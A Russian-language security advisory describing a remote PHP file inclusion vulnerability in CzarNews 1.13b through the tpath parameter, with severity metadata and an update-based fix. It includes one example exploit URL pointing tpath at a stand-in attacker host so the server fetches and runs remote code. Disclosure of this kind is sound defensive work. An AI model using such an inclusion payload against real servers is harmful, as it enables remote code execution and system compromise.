PHP-инклюдинг в CzarNews

Дата публикации:
22.03.2005
Дата изменения:
24.03.2009
Всего просмотров:
818
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CzarNews 1.x
Уязвимые версии: CzarNews 1.13b

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует из-за некорректной обработки входных данных в переменной tpath. Удаленный пользователь может изменить значение этой переменной на произвольный URL и выполнить одноименные сценарии на сервере. Для успешной эксплуатации уязвимости 'register_globals' и 'allow_url_fopen' должны быть включены в конфигурационном файле php на целевом сервере. Пример:

http://192.168.0.115/research/news/CzarNewsv113b
/headlines.php?tpath=http://attackerip/

URL производителя: www.czaries.net/scripts/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA